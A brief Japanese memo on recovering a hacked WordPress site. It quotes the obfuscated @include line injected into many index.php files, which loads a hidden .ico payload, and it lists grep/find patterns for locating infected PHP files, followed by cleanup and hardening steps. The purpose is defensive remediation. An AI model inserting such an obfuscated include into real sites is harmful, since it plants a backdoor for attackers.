WordPress 不正侵入後の対処

サーバー侵入 不正ファイル検索

\@include “\057va\162/w\167w/\166ho\163ts\057gr\163.c\141t/\150tt\160do\143s/\060OL\104_S\111TE\057Bl\141de\137fl\141sk\137ar\143hi\166os\057.1\0662e\070ba\065.i\143o”;

あちこちのindex.phpにこんな文字列が行挿入されている

不審な文字列はここでデコードする
https://malwaredecoder.com/

 
var/www/html/wp-includes/PHPMailer/.136cf3b7.ico
 

を読み込むらしい。

プラグイン https://ja.wordpress.org/plugins/wp-simple-firewall/
を入れる → shield Securityによる認識されていないfileのスキャン
→ 見つかったファイルは削除

 
 grep -r ';}exit();}} ?><?php' ./*
 find ./ -name '*.php'  -type f -print | xargs grep '057va'
 find ./ '*.php' -type f -print | xargs grep '@file_put_contents'
 find ./ -name '*.php'  -type f -print | xargs grep 'eval('
 find ./ -name '*.php'  -type f -print | xargs grep 'Array();global'
 find . -type f -name '*.php' -newermt '2020-10-01'

ターミナルから文字列検索して見つかったファイルはviで開いて行削除
怪しいファイルと同じ日付に更新されたファイルも削除か行削除

サーバーのパスワードは全て変更する
鍵ファイルも変更する

不審なファイルの所有者はapacheになっているのでWEBアクセスで置かれた可能性が高い
しばらくはapacheに書き込み権限を与えないほうがいい